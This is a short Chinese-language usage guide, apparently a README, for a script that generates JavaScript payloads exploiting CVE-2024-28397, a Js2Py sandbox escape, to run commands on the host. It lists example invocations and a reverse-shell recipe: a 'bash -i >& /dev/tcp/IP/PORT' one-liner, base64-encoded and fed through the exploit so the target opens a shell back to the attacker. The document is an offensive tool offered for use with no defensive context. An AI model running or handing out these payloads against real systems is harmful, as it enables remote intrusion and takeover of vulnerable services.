
生成 JavaScript 载荷以利用 CVE-2024-28397 Js2Py 沙箱逃逸,通过暴露 Python 内部机制实现远程命令执行和反向 Shell。
该脚本用于生成 JavaScript Payload,可在存在漏洞、且 Python 内部实现通过对象包装器暴露的 Js2Py 环境中被求值执行。
基本命令执行:
python3 cve-2024-28397.py -c "id"
生成紧凑的单行 Payload:
python3 cve-2024-28397.py -c "whoami" --compact
生成 Base64 Payload:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
生成 Js2Py Payload:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
将 BASE64_OUTPUT 替换为第一步中生成的 Base64 字符串。